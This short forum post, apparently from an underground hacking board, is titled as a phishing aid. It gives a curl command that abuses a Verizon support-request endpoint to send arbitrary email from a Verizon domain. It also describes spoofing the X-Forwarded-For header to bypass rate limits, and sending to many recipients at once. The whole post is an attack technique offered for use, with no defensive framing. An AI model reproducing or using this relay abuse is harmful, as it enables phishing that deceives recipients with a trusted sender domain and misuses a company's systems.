Verizon Email Relay - Perfect for Phishing

KILICDARIHRAC

Newbie
MEMBER
Joined
May 31, 2026
Messages
1
Reaction score
3
Deposit
0$
You can send emails from Verizon domain using this technique:


Bash:
curl -X POST "https://thingspace.verizon.com/sso/ui/api/user/supportRequest"   -H "Content-Type: application/json"   -H "X-Forwarded-For: 127.0.0.1"   -d '{"to":"[email protected]","subject":"Subject","body":"Body"}'

Rate Limit Bypass: Change "X-Forwarded-For" header value.
Multiple Recipients: Use array in "to" param. Example: "to":["[email protected]", "[email protected]"]​
 
Top Bottom